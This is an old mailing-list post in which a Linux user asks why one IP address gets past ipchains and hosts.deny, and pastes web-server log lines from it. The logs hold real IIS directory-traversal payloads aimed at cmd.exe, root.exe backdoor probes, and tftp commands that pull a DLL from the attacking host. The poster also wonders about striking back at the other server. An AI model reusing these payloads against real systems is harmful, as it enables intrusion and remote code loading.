[newbie] Can't block dos attack

Sun, 28 Jul 2002 17:31:00 -0700 

I am getting strange hits to my web server,
I don't like it and I wish to know how
to stop them from slipping past my defenses.

I try using ipchains, most addresses are
blocked, but for reasons I can't figure out,
this address 65.192.23.150 keeps showing up.

I don't understand it, if ipchains,
/etc/hosts.deny can't block it, what can?

Do I send back a command to shut down
their server?

How do I get the point accross?

65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 342 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 358 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
/scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
/scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
/MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0" 200 87 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
/MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
"-"
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
"-"
65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 342 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 342 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 358 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 324 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 308 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"

__________________________________________________
Do You Yahoo!?
Yahoo! Health - Feel better, live better
http://health.yahoo.com


Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com

Reply via email to